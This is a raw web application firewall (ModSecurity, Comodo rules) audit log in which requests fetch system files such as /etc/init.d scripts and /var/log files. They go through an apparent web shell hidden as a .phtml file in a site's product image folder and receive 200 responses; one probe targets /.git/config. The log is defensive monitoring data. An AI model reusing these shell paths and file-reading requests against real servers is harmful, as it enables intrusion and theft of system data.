[msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/cryptdisks-early"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5uy5oX9bs_jrDBLBFkJQAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/cryptdisks-early"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5uy5oX9bs_jrDBLBFkJQAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970635798771 4207 (- - -) Stopwatch2: 1749970635798771 4207; combined=2401, p1=339, p2=1906, p3=37, p4=34, p5=85, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2832703d-Z-- --cf159060-A-- [15/Jun/2025:12:27:51.713487 +0530] aE5u77axs8_oWLL8MgpCZgAAAAY 54.84.169.196 37506 127.0.0.1 7081 --cf159060-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/grub-common HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.84.169.196 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --cf159060-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3441 Connection: close Content-Type: text/html; charset=UTF-8 --cf159060-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/grub-common"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5u77axs8_oWLL8MgpCZgAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/grub-common"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5u77axs8_oWLL8MgpCZgAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970671709124 4415 (- - -) Stopwatch2: 1749970671709124 4415; combined=2262, p1=370, p2=1727, p3=38, p4=35, p5=91, sr=108, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cf159060-Z-- --6a04097e-A-- [15/Jun/2025:12:28:23.818134 +0530] aE5vD3xTls_n68HhJPDU9wAAAAE 44.205.180.155 47382 127.0.0.1 7081 --6a04097e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/kern.log.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.205.180.155 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --6a04097e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2949 Connection: close Content-Type: text/html; charset=UTF-8 --6a04097e-H-- Message: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5vD3xTls_n68HhJPDU9wAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970703813990 4195 (- - -) Stopwatch2: 1749970703813990 4195; combined=2303, p1=336, p2=1844, p3=36, p4=32, p5=55, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6a04097e-Z-- --87e3b503-A-- [15/Jun/2025:12:28:28.752898 +0530] aE5vFD8QAuiw8zL7QHNvvQAAAAU 23.21.179.120 47510 127.0.0.1 7081 --87e3b503-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/mail.err.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 23.21.179.120 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --87e3b503-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2949 Connection: close Content-Type: text/html; charset=UTF-8 --87e3b503-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5vFD8QAuiw8zL7QHNvvQAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970708749111 3847 (- - -) Stopwatch2: 1749970708749111 3847; combined=1985, p1=355, p2=1505, p3=34, p4=34, p5=56, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --87e3b503-Z-- --38f4394c-A-- [15/Jun/2025:12:28:42.412752 +0530] aE5vIA2pbpddt_O7FYy-0AAAAAc 161.35.56.0 40364 127.0.0.1 7081 --38f4394c-B-- GET /.git/config HTTP/1.0 Host: www.home9ine.com X-Real-IP: 161.35.56.0 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.35 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --38f4394c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Set-Cookie: _sfs_id=6032d2c37359174d28ca3717f24bfceb1749970721; expires=Sun, 15 Jun 2025 07:58:41 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --38f4394c-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.home9ine.com"] [uri "/.git/config"] [unique_id "aE5vIA2pbpddt_O7FYy-0AAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/home9ine.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749970720652066 1760750 (- - -) Stopwatch2: 1749970720652066 1760750; combined=1960, p1=486, p2=1385, p3=0, p4=0, p5=89, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --38f4394c-Z-- --01ba1f55-A-- [15/Jun/2025:12:29:29.878044 +0530] aE5vUQ2pbpddt_O7FYy-5wAAAAc 216.73.216.83 56724 127.0.0.1 7081 --01ba1f55-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fmail.err.1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --01ba1f55-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2945 Connection: close Content-Type: text/html; charset=UTF-8 --01ba1f55-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5vUQ2pbpddt_O7FYy-5wAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970769874174 3933 (- - -) Stopwatch2: 1749970769874174 3933; combined=2066, p1=361, p2=1583, p3=34, p4=33, p5=55, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --01ba1f55-Z--